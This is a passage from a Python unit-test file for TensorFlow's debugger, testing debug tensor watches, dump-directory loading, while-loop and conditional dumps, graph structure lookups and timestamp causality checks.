w = math_ops.matmul(u, v, name=w_name)
u.initializer.run()
v.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = "file://%s" % self._dump_root
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % u_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
# Invoke Session.run().
sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
simple_add_results = collections.namedtuple("SimpleAddResults", [
"u_init_val", "v_init_val", "u", "v", "w", "u_name", "v_name", "w_name",
"dump"
])
return simple_add_results(u_init_val, v_init_val, u, v, w, u_name, v_name,
w_name, dump)
def testCopyNodesHaveCorrectDebugOpsAndURLsAttributeValues(self):
with session.Session() as sess:
u = variables.Variable(2.1, name="u")
v = variables.Variable(20.0, name="v")
w = math_ops.multiply(u, v, name="w")
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
debug_utils.add_debug_tensor_watch(
run_options,
"u",
0, ["DebugNumericSummary(gated_grpc=True)", "DebugIdentity"],
debug_urls=debug_urls)
debug_utils.add_debug_tensor_watch(
run_options, "v", 0, ["DebugNumericSummary"], debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
r = sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertAllClose(42.0, r)
u_copy_node_def = None
v_copy_node_def = None
for partition_graph in run_metadata.partition_graphs:
for node_def in partition_graph.node:
if debug_data.is_copy_node(node_def.name):
if node_def.name == "__copy_u_0":
u_copy_node_def = node_def
elif node_def.name == "__copy_v_0":
v_copy_node_def = node_def
self.assertIsNotNone(u_copy_node_def)
debug_ops_spec = u_copy_node_def.attr["debug_ops_spec"].list.s
self.assertEqual(2, len(debug_ops_spec))
self.assertEqual("DebugNumericSummary;%s;1" % debug_urls[0],
debug_ops_spec[0].decode("utf-8"))
self.assertEqual("DebugIdentity;%s;0" % debug_urls[0],
debug_ops_spec[1].decode("utf-8"))
self.assertIsNotNone(v_copy_node_def)
debug_ops_spec = v_copy_node_def.attr["debug_ops_spec"].list.s
self.assertEqual(1, len(debug_ops_spec))
self.assertEqual("DebugNumericSummary;%s;0" % debug_urls[0],
debug_ops_spec[0].decode("utf-8"))
def testConcurrentDumpingToPathsWithOverlappingParentDirsWorks(self):
results = self._generate_dump_from_simple_addition_graph()
self.assertTrue(results.dump.loaded_partition_graphs())
# Since global_step is not explicitly specified, it should take its default
# value: -1.
self.assertEqual(-1, results.dump.core_metadata.global_step)
self.assertGreaterEqual(results.dump.core_metadata.session_run_index, 0)
self.assertGreaterEqual(results.dump.core_metadata.executor_step_index, 0)
self.assertEqual([], results.dump.core_metadata.input_names)
self.assertEqual([results.w.name], results.dump.core_metadata.output_names)
self.assertEqual([], results.dump.core_metadata.target_nodes)
# Verify the dumped tensor values for u and v.
self.assertEqual(2, results.dump.size)
self.assertAllClose([results.u_init_val],
results.dump.get_tensors("%s/read" % results.u_name, 0,
"DebugIdentity"))
self.assertAllClose([results.v_init_val],
results.dump.get_tensors("%s/read" % results.v_name, 0,
"DebugIdentity"))
self.assertGreaterEqual(
results.dump.get_rel_timestamps("%s/read" % results.u_name, 0,
"DebugIdentity")[0], 0)
self.assertGreaterEqual(
results.dump.get_rel_timestamps("%s/read" % results.v_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
results.dump.get_dump_sizes_bytes("%s/read" % results.u_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
results.dump.get_dump_sizes_bytes("%s/read" % results.v_name, 0,
"DebugIdentity")[0], 0)
def testGetOpTypeWorks(self):
results = self._generate_dump_from_simple_addition_graph()
self.assertEqual(results.u.op.type,
results.dump.node_op_type(results.u_name))
self.assertIn(results.v.op.type, results.dump.node_op_type(results.v_name))
self.assertIn(results.w.op.type, results.dump.node_op_type(results.w_name))
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
results.dump.node_op_type("foo_bar")
def testDumpStringTensorsWorks(self):
with session.Session() as sess:
str1_init_val = np.array(b"abc")
str2_init_val = np.array(b"def")
str1_init = constant_op.constant(str1_init_val)
str2_init = constant_op.constant(str2_init_val)
str1_name = "str1"
str2_name = "str2"
str1 = variables.Variable(str1_init, name=str1_name)
str2 = variables.Variable(str2_init, name=str2_name)
# Concatenate str1 and str2
str_concat = math_ops.add(str1, str2, name="str_concat")
str1.initializer.run()
str2.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % str1_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % str2_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
sess.run(str_concat, options=run_options, run_metadata=run_metadata)
# String ops are located on CPU.
self.assertEqual(1, len(run_metadata.partition_graphs))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
self.assertIn(str1_name, dump.nodes())
self.assertIn(str2_name, dump.nodes())
self.assertEqual(2, dump.size)
self.assertEqual([str1_init_val],
dump.get_tensors("%s/read" % str1_name, 0,
"DebugIdentity"))
self.assertEqual([str2_init_val],
dump.get_tensors("%s/read" % str2_name, 0,
"DebugIdentity"))
self.assertGreaterEqual(
dump.get_rel_timestamps("%s/read" % str1_name, 0, "DebugIdentity")[0],
0)
self.assertGreaterEqual(
dump.get_rel_timestamps("%s/read" % str2_name, 0, "DebugIdentity")[0],
0)
self.assertGreater(
dump.get_dump_sizes_bytes("%s/read" % str1_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
dump.get_dump_sizes_bytes("%s/read" % str2_name, 0,
"DebugIdentity")[0], 0)
def testDumpUninitializedVariable(self):
op_namespace = "testDumpUninitializedVariable"
with session.Session() as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
s_init_val = b"str1"
u_name = "%s/u" % op_namespace
s_name = "%s/s" % op_namespace
u_init = constant_op.constant(u_init_val, shape=[2, 2])
u = variables.Variable(u_init, name=u_name)
s_init = constant_op.constant(s_init_val)
s = variables.Variable(s_init, name=s_name)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s" % u_name, 0, debug_urls=debug_urls)
debug_utils.add_debug_tensor_watch(
run_options, "%s" % s_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
# Initialize u and s.
sess.run(variables.global_variables_initializer(),
options=run_options,
run_metadata=run_metadata)
# Verify the dump file for the uninitialized value of u.
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
self.assertEqual(2, dump.size)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
# Verify that the variable is properly initialized by the run() call.
u_vals = dump.get_tensors(u_name, 0, "DebugIdentity")
s_vals = dump.get_tensors(s_name, 0, "DebugIdentity")
self.assertEqual(1, len(u_vals))
self.assertIsInstance(u_vals[0], debug_data.InconvertibleTensorProto)
self.assertFalse(u_vals[0].initialized)
self.assertEqual(1, len(s_vals))
self.assertIsInstance(s_vals[0], debug_data.InconvertibleTensorProto)
self.assertFalse(s_vals[0].initialized)
# Call run() again, to check that u is initialized properly.
self.assertAllClose(u_init_val, sess.run(u))
self.assertEqual(s_init_val, sess.run(s))
def testDebugWhileLoopGeneratesMultipleDumps(self):
with session.Session() as sess:
num_iter = 10
# "u" is the Variable being updated in the loop.
u_name = "testDumpToFileWhileLoop/u"
u_namespace = u_name.split("/")[0]
u_init_val = np.array(11.0)
u_init = constant_op.constant(u_init_val)
u = variables.Variable(u_init, name=u_name)
# "v" is the increment.
v_name = "testDumpToFileWhileLoop/v"
v_namespace = v_name.split("/")[0]
v_init_val = np.array(2.0)
v_init = constant_op.constant(v_init_val)
v = variables.Variable(v_init, name=v_name)
u.initializer.run()
v.initializer.run()
i = constant_op.constant(0, name="testDumpToFileWhileLoop/i")
def cond(i):
return math_ops.less(i, num_iter)
def body(i):
new_u = state_ops.assign_add(u, v)
new_i = math_ops.add(i, 1)
op = control_flow_ops.group(new_u)
new_i = control_flow_ops.with_dependencies([op], new_i)
return [new_i]
loop = control_flow_ops.while_loop(
cond, body, [i], parallel_iterations=10)
# Create RunOptions for debug-watching tensors
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for while/Identity.
debug_utils.add_debug_tensor_watch(
run_options, "while/Identity", 0, debug_urls=debug_urls)
# Add debug tensor watch for while/Add/y.
debug_utils.add_debug_tensor_watch(
run_options, "while/Add/y", 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
r = sess.run(loop, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
self.assertEqual(num_iter, r)
u_val_final = sess.run(u)
self.assertAllClose(u_init_val + num_iter * v_init_val, u_val_final)
# Verify dump files
self.assertTrue(os.path.isdir(self._dump_root))
u_glob_out = glob.glob(os.path.join(self._dump_root, "*", u_namespace))
v_glob_out = glob.glob(os.path.join(
self._dump_root, "*", v_namespace, "v"))
self.assertTrue(os.path.isdir(u_glob_out[0]))
self.assertTrue(os.path.isdir(v_glob_out[0]))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Expected dumped tensors: u, v/read, 10 iterations of while/Identity,
# and 10 iterations of while/Add/y.
self.assertEqual(1 + 1 + num_iter + num_iter, dump.size)
# Verify tensor values.
self.assertAllClose([u_init_val],
dump.get_tensors(u_name, 0, "DebugIdentity"))
self.assertAllClose([v_init_val],
dump.get_tensors("%s/read" % v_name, 0,
"DebugIdentity"))
while_id_tensors = dump.get_tensors("while/Identity", 0, "DebugIdentity")
self.assertEqual(10, len(while_id_tensors))
for k in xrange(len(while_id_tensors)):
self.assertAllClose(np.array(k), while_id_tensors[k])
# Verify ascending timestamps from the while loops.
while_id_rel_timestamps = dump.get_rel_timestamps("while/Identity", 0,
"DebugIdentity")
while_id_dump_sizes_bytes = dump.get_dump_sizes_bytes("while/Identity", 0,
"DebugIdentity")
self.assertEqual(10, len(while_id_rel_timestamps))
prev_rel_time = 0
prev_dump_size_bytes = while_id_dump_sizes_bytes[0]
for rel_time, dump_size_bytes in zip(while_id_rel_timestamps,
while_id_dump_sizes_bytes):
self.assertGreaterEqual(rel_time, prev_rel_time)
self.assertEqual(dump_size_bytes, prev_dump_size_bytes)
prev_rel_time = rel_time
prev_dump_size_bytes = dump_size_bytes
# Test querying debug watch keys from node name.
watch_keys = dump.debug_watch_keys("while/Identity")
self.assertEqual(["while/Identity:0:DebugIdentity"], watch_keys)
# Test querying debug datum instances from debug watch key.
self.assertEqual(10, len(dump.watch_key_to_data(watch_keys[0])))
self.assertEqual([], dump.watch_key_to_data("foo"))
def testDebugWhileLoopWatchingWholeGraphWorks(self):
with session.Session() as sess:
loop_body = lambda i: math_ops.add(i, 2)
loop_cond = lambda i: math_ops.less(i, 16)
i = constant_op.constant(10, name="i")
loop = control_flow_ops.while_loop(loop_cond, loop_body, [i])
loop_result, dump = self._debug_run_and_get_dump(sess, loop)
self.assertEqual(16, loop_result)
self.assertEqual(
[[10]], dump.get_tensors("while/Enter", 0, "DebugIdentity"))
self.assertEqual(
[[12], [14], [16]],
dump.get_tensors("while/NextIteration", 0, "DebugIdentity"))
def testDebugTrainingDynamicRNNWorks(self):
with session.Session() as sess:
input_size = 3
state_size = 2
time_steps = 4
batch_size = 2
input_values = np.random.randn(time_steps, batch_size, input_size)
sequence_length = np.random.randint(0, time_steps, size=batch_size)
concat_inputs = array_ops.placeholder(
dtypes.float32, shape=(time_steps, batch_size, input_size))
outputs_dynamic, _ = rnn.dynamic_rnn(
_RNNCellForTest(input_size, state_size),
inputs=concat_inputs,
sequence_length=sequence_length,
time_major=True,
dtype=dtypes.float32)
toy_loss = math_ops.reduce_sum(outputs_dynamic * outputs_dynamic)
train_op = gradient_descent.GradientDescentOptimizer(
learning_rate=0.1).minimize(toy_loss, name="train_op")
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph_with_blacklists(
run_options,
sess.graph,
node_name_regex_blacklist="(.*rnn/while/.*|.*TensorArray.*)",
debug_urls=self._debug_urls())
# b/36870549: Nodes with these name patterns need to be excluded from
# tfdbg in order to prevent MSAN warnings of uninitialized Tensors
# under both file:// and grpc:// debug URL schemes.
run_metadata = config_pb2.RunMetadata()
sess.run(train_op, feed_dict={concat_inputs: input_values},
options=run_options, run_metadata=run_metadata)
debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testDebugCondWatchingWholeGraphWorks(self):
with session.Session() as sess:
x = variables.Variable(10.0, name="x")
y = variables.Variable(20.0, name="y")
cond = control_flow_ops.cond(
x > y, lambda: math_ops.add(x, 1), lambda: math_ops.add(y, 1))
sess.run(variables.global_variables_initializer())
cond_result, dump = self._debug_run_and_get_dump(sess, cond)
self.assertEqual(21, cond_result)
self.assertAllClose(
[21.0], dump.get_tensors("cond/Merge", 0, "DebugIdentity"))
def testFindNodesWithBadTensorValues(self):
with session.Session() as sess:
u_name = "testFindNodesWithBadTensorValues/u"
v_name = "testFindNodesWithBadTensorValues/v"
w_name = "testFindNodesWithBadTensorValues/w"
x_name = "testFindNodesWithBadTensorValues/x"
y_name = "testFindNodesWithBadTensorValues/y"
z_name = "testFindNodesWithBadTensorValues/z"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v_init = constant_op.constant([2.0, 1.0])
v = variables.Variable(v_init, name=v_name)
# Expected output: [0.0, 3.0]
w = math_ops.subtract(u, v, name=w_name)
# Expected output: [inf, 1.3333]
x = math_ops.div(u, w, name=x_name)
# Expected output: [nan, 4.0]
y = math_ops.multiply(w, x, name=y_name)
z = math_ops.multiply(y, y, name=z_name)
u.initializer.run()
v.initializer.run()
_, dump = self._debug_run_and_get_dump(
sess, z,
expected_partition_graph_count=self._expected_partition_graph_count)
def has_bad_value(_, tensor):
return np.any(np.isnan(tensor)) or np.any(np.isinf(tensor))
# Find all "offending tensors".
bad_data = dump.find(has_bad_value)
# Verify that the nodes with bad values are caught through running find
# on the debug dump.
self.assertEqual(3, len(bad_data))
self.assertEqual(x_name, bad_data[0].node_name)
self.assertEqual(y_name, bad_data[1].node_name)
self.assertEqual(z_name, bad_data[2].node_name)
# Test first_n kwarg of find(): Find the first offending tensor.
first_bad_datum = dump.find(has_bad_value, first_n=1)
self.assertEqual(1, len(first_bad_datum))
self.assertEqual(x_name, first_bad_datum[0].node_name)
def _session_run_for_graph_structure_lookup(self):
with session.Session() as sess:
u_name = "testDumpGraphStructureLookup/u"
v_name = "testDumpGraphStructureLookup/v"
w_name = "testDumpGraphStructureLookup/w"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v = math_ops.add(u, u, name=v_name)
w = math_ops.add(v, v, name=w_name)
u.initializer.run()
_, dump = self._debug_run_and_get_dump(
sess, w,
expected_partition_graph_count=self._expected_partition_graph_count)
return u_name, v_name, w_name, dump
def testGraphStructureLookupGivesDevicesAndNodesInfo(self):
u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
# Test num_devices().
self.assertEqual(self._expected_num_devices, len(dump.devices()))
# Test node_device().
self.assertEqual(self._main_device, dump.node_device(u_name))
with self.assertRaisesRegexp(ValueError,
"does not exist in partition graphs"):
dump.node_device(u_name + "foo")
# Test node_exists().
self.assertTrue(dump.node_exists(u_name))
self.assertTrue(dump.node_exists(u_name + "/read"))
self.assertFalse(dump.node_exists(u_name + "/read" + "/foo"))
def testGraphStructureLookupGivesNodesAndAttributes(self):
u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
u_read_name = u_name + "/read"
# Test node name list lookup of the DebugDumpDir object.
if test_util.gpu_device_name():
node_names = dump.nodes(
device_name="/job:localhost/replica:0/task:0/gpu:0")
else:
node_names = dump.nodes()
self.assertTrue(u_name in node_names)
self.assertTrue(u_read_name in node_names)
# Test querying node attributes.
u_attr = dump.node_attributes(u_name)
self.assertEqual(dtypes.float32, u_attr["dtype"].type)
self.assertEqual(1, len(u_attr["shape"].shape.dim))
self.assertEqual(2, u_attr["shape"].shape.dim[0].size)
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_attributes("foo")
def testGraphStructureLookupGivesDebugWatchKeys(self):
u_name, v_name, w_name, dump = (
self._session_run_for_graph_structure_lookup())
# Test querying the debug watch keys with node names.
self.assertEqual(["%s:0:DebugIdentity" % u_name],
dump.debug_watch_keys(u_name))
self.assertEqual(["%s:0:DebugIdentity" % v_name],
dump.debug_watch_keys(v_name))
self.assertEqual(["%s:0:DebugIdentity" % w_name],
dump.debug_watch_keys(w_name))
self.assertEqual([], dump.debug_watch_keys("foo"))
# Test querying debug datum instances from debug watch.
u_data = dump.watch_key_to_data(dump.debug_watch_keys(u_name)[0])
self.assertEqual(1, len(u_data))
self.assertEqual(u_name, u_data[0].node_name)
self.assertEqual(0, u_data[0].output_slot)
self.assertEqual("DebugIdentity", u_data[0].debug_op)
self.assertGreaterEqual(u_data[0].timestamp, 0)
self.assertEqual([], dump.watch_key_to_data("foo"))
def testGraphStructureLookupGivesNodeInputsAndRecipients(self):
u_name, v_name, w_name, dump = (
self._session_run_for_graph_structure_lookup())
u_read_name = u_name + "/read"
# Test the inputs lookup of the DebugDumpDir object.
self.assertEqual([], dump.node_inputs(u_name))
self.assertEqual([u_name], dump.node_inputs(u_read_name))
self.assertEqual([u_read_name] * 2, dump.node_inputs(v_name))
self.assertEqual([v_name] * 2, dump.node_inputs(w_name))
self.assertEqual([], dump.node_inputs(u_name, is_control=True))
self.assertEqual([], dump.node_inputs(u_read_name, is_control=True))
self.assertEqual([], dump.node_inputs(v_name, is_control=True))
self.assertEqual([], dump.node_inputs(w_name, is_control=True))
# Test the outputs recipient lookup of the DebugDumpDir object.
self.assertTrue(u_read_name in dump.node_recipients(u_name))
self.assertEqual(2, dump.node_recipients(u_read_name).count(v_name))
self.assertEqual(2, dump.node_recipients(v_name).count(w_name))
self.assertEqual([], dump.node_recipients(u_name, is_control=True))
self.assertEqual([], dump.node_recipients(u_read_name, is_control=True))
self.assertEqual([], dump.node_recipients(v_name, is_control=True))
self.assertEqual([], dump.node_recipients(w_name, is_control=True))
# Test errors raised on invalid node names.
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_inputs(u_name + "foo")
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_recipients(u_name + "foo")
# Test transitive_inputs().
self.assertEqual([], dump.transitive_inputs(u_name))
self.assertEqual([u_name], dump.transitive_inputs(u_read_name))
self.assertEqual(
set([u_name, u_read_name]), set(dump.transitive_inputs(v_name)))
self.assertEqual(
set([u_name, u_read_name, v_name]), set(dump.transitive_inputs(w_name)))
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.transitive_inputs(u_name + "foo")
def testGraphStructureLookupWithoutPartitionGraphsDoesNotErrorOut(self):
_, _, _, dump = self._session_run_for_graph_structure_lookup()
# Now load the dump again, without the partition graphs, so we can check
# errors are not raised because the partition graphs are loaded from the
# dump directory.
dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
self.assertTrue(dump.loaded_partition_graphs())
def testGraphPathFindingOnControlEdgesWorks(self):
with session.Session() as sess:
v1 = variables.Variable(1.0, name="v1")
v2 = variables.Variable(2.0, name="v2")
v3 = variables.Variable(3.0, name="v3")
a = math_ops.add(v1, v2, name="a")
with ops.control_dependencies([a]):
c = math_ops.subtract(v3, v3, name="c")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, c)
self.assertEqual(["v1", "v1/read", "a", "c"],
dump.find_some_path("v1", "c"))
self.assertIsNone(dump.find_some_path("v1", "c", include_control=False))
def testGraphPathFindingReverseRefEdgeWorks(self):
with session.Session() as sess:
v = variables.Variable(10.0, name="v")
delta = variables.Variable(1.0, name="delta")
inc_v = state_ops.assign_add(v, delta, name="inc_v")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, inc_v)
self.assertEqual(
["delta", "delta/read", "inc_v", "v"],
dump.find_some_path("delta", "v", include_reversed_ref=True))
self.assertIsNone(dump.find_some_path("delta", "v"))
def testCausalityCheckOnDumpsDetectsWrongTemporalOrder(self):
with session.Session() as sess:
u_name = "testDumpCausalityCheck/u"
v_name = "testDumpCausalityCheck/v"
w_name = "testDumpCausalityCheck/w"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v = math_ops.add(u, u, name=v_name)
w = math_ops.add(v, v, name=w_name)
u.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=self._debug_urls())
run_metadata = config_pb2.RunMetadata()
sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
# First, loading the original dump without supplying the
# partition_graphs should not cause a LookupError, validation occurs
# only with partition_graphs loaded.
debug_data.DebugDumpDir(self._dump_root)
# Now, loading the original dump with partition graphs supplied should
# succeed. The validation should pass quietly.
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Get the dump file names and compute their timestamps.
self.assertEqual(
1, len(dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")))
v_file_path = dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")[0]
self.assertEqual(
1, len(dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")))
w_file_path = dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")[0]
v_timestamp = int(v_file_path[v_file_path.rindex("_") + 1:])
w_timestamp = int(w_file_path[w_file_path.rindex("_") + 1:])
# Swap and slightly shift the time stamps of the last two dumped tensors,
# to simulate "causality violation", which can happen if the dump
# directory contains incomplete data and/or mixes data from different
# Session.run() calls.
v_file_path_1 = v_file_path[:v_file_path.rindex(
"_")] + "_%d" % w_timestamp
w_file_path_1 = w_file_path[:w_file_path.rindex("_")] + "_%d" % (
v_timestamp - 1)
os.rename(v_file_path, v_file_path_1)
os.rename(w_file_path, w_file_path_1)
# Load the dump directory again. Now a ValueError is expected to be
# raised due to the timestamp swap.
with self.assertRaisesRegexp(ValueError, "Causality violated"):
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Loading the dump directory with kwarg "validate" set explicitly to
# False should get rid of the error.
dump = debug_data.DebugDumpDir(
self._dump_root,
partition_graphs=run_metadata.partition_graphs,
validate=False)
# Next, set the two time stamps to be the same, which should be fine.
v_file_path_2 = v_file_path[:v_file_path.rindex(
"_")] + "_%d" % w_timestamp
w_file_path_2 = w_file_path[:w_file_path.rindex(
"_")] + "_%d" % w_timestamp
os.rename(v_file_path_1, v_file_path_2)
os.rename(w_file_path_1, w_file_path_2)
debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testWatchingOnlyOneOfTwoOutputSlotsDoesNotLeadToCausalityFailure(self):
with session.Session() as sess:
x_name = "oneOfTwoSlots/x"
u_name = "oneOfTwoSlots/u"
v_name = "oneOfTwoSlots/v"
w_name = "oneOfTwoSlots/w"
y_name = "oneOfTwoSlots/y"
x = variables.Variable([1, 3, 3, 7], dtype=dtypes.int32, name=x_name)
sess.run(x.initializer)
unique_x, indices, _ = array_ops.unique_with_counts(x, name=u_name)
v = math_ops.add(unique_x, unique_x, name=v_name)
w = math_ops.add(indices, indices, name=w_name)
y = math_ops.add(w, w, name=y_name)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
# Watch only the first output slot of u, even though it has two output
# slots.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=self._debug_urls())
debug_utils.add_debug_tensor_watch(
run_options, w_name, 0, debug_urls=self._debug_urls())
debug_utils.add_debug_tensor_watch(
run_options, y_name, 0, debug_urls=self._debug_urls())
run_metadata = config_pb2.RunMetadata()
sess.run([v, y], options=run_options, run_metadata=run_metadata)
dump = debug_data.DebugDumpDir(
self._dump_root,
partition_graphs=run_metadata.partition_graphs,
validate=True)
self.assertAllClose([1, 3, 7],
dump.get_tensors(u_name, 0, "DebugIdentity")[0])
def testOutputSlotWithoutOutgoingEdgeCanBeWatched(self):
"""Test watching output slots not attached to any outgoing edges."""
with session.Session() as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
u = constant_op.constant(u_init_val, shape=[2, 2], name="u")
# Create a control edge from a node with an output: From u to z.
# Node u will get executed only because of the control edge. The output
# tensor u:0 is not attached to any outgoing edge in the graph. This test
# checks that the debugger can watch such a tensor.
with ops.control_dependencies([u]):
z = control_flow_ops.no_op(name="z")
_, dump = self._debug_run_and_get_dump(sess, z)
# Assert that the DebugIdentity watch on u works properly.
self.assertEqual(1, len(dump.dumped_tensor_data))
datum = dump.dumped_tensor_data[0]
self.assertEqual("u", datum.node_name)
self.assertEqual(0, datum.output_slot)
self.assertEqual("DebugIdentity", datum.debug_op)
self.assertAllClose([[5.0, 3.0], [-1.0, 0.0]], datum.get_tensor())
def testWatchingVariableUpdateOpsSeesUpdatedValues(self):
"""Watch output slots on Variable-updating ops, with no emitted edges."""
with session.Session() as sess:
u_init = constant_op.constant(10.0)
u = variables.Variable(u_init, name="gdo/u")
v_init = constant_op.constant(20.0)
v = variables.Variable(v_init, name="gdo/v")
w = math_ops.multiply(u, v, name="gdo/w")
# gdo stands for GradientDescentOptimizer.
train_op = gradient_descent.GradientDescentOptimizer(
learning_rate=0.1).minimize(
w, name="gdo/train")
u.initializer.run()
v.initializer.run()
_, dump = self._debug_run_and_get_dump(sess, train_op)
update_u_data = dump.watch_key_to_data(
"gdo/train/update_gdo/u/ApplyGradientDescent:0:DebugIdentity")
self.assertEqual(1, len(update_u_data))
# Gradient descent on u: w = u * v, so dw / du = v.
# Updated value of u should be:
# 10.0 - learning_rate * v = 10.0 - 0.1 * 20.0 = 8.0
self.assertAllClose(8.0, update_u_data[0].get_tensor())
update_v_data = dump.watch_key_to_data(
"gdo/train/update_gdo/v/ApplyGradientDescent:0:DebugIdentity")
self.assertEqual(1, len(update_v_data))
# Gradient descent on u: w = u * v, so dw / dv = u.
# Updated value of u should be:
# 20.0 - learning_rate * u = 20.0 - 0.1 * 10.0 = 19.0
self.assertAllClose(19.0, update_v_data[0].get_tensor())
# Verify that the Variables u and v are updated properly.
self.assertAllClose(8.0, sess.run(u))
self.assertAllClose(19.0, sess.run(v))
def testAllowsWatchingUnconnectedOutputTensor(self):
"""Watch an output slot not emitting any edges.
(Not even control edges from the node.)
"""
with session.Session() as sess:
x_init = constant_op.constant([2, 2, 3, 5, 5])
x = variables.Variable(x_init, name="unconnected/x")
# The UniqueOp (tf.unique) has two output slots. Use only slot 0 in the
# graph. Let the debugger watch the unused slot 1.
unique_x, _ = array_ops.unique(x, name="unconnected/unique_x")
y = math_ops.add(unique_x, [0, 1, 2], name="unconnected/y")
x.initializer.run()
# Verify that only slot 0 of unique_x has recipients, while slot 1 of the
# same node does not have recipients.
unique_x_slot_0_recipients = []
unique_x_slot_1_recipients = []
for op in sess.graph.get_operations():
for inp in op.inputs:
if inp.name == "unconnected/unique_x:0":
unique_x_slot_0_recipients.append(op.name)
elif inp.name == "unconnected/unique_x:1":
unique_x_slot_1_recipients.append(op.name)
self.assertEqual(["unconnected/y"], unique_x_slot_0_recipients)
self.assertEqual([], unique_x_slot_1_recipients)
y_result, dump = self._debug_run_and_get_dump(sess, y)
self.assertAllClose([2, 4, 7], y_result)
# Assert that the connected slot (slot 0) is dumped properly.
unique_x_slot_0_dumps = dump.watch_key_to_data(
"unconnected/unique_x:0:DebugIdentity")
self.assertEqual(1, len(unique_x_slot_0_dumps))
self.assertEqual("unconnected/unique_x",
unique_x_slot_0_dumps[0].node_name)
self.assertEqual(0, unique_x_slot_0_dumps[0].output_slot)
self.assertAllClose([2, 3, 5], unique_x_slot_0_dumps[0].get_tensor())
# Assert that the unconnected slot (slot 1) is dumped properly.
unique_x_slot_1_dumps = dump.watch_key_to_data(
"unconnected/unique_x:1:DebugIdentity")
self.assertEqual(1, len(unique_x_slot_1_dumps))
self.assertEqual("unconnected/unique_x",
unique_x_slot_1_dumps[0].node_name)
self.assertEqual(1, unique_x_slot_1_dumps[0].output_slot)
self.assertAllClose([0, 0, 1, 2, 2],
unique_x_slot_1_dumps[0].get_tensor())
def testSuccessiveDebuggingRunsIncreasesCounters(self):
"""Test repeated Session.run() calls with debugger increments counters."""
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32, name="successive/ph")
x = array_ops.transpose(ph, name="mismatch/x")
y = array_ops.squeeze(ph, name="mismatch/y")
_, dump1 = self._debug_run_and_get_dump(
sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=1)
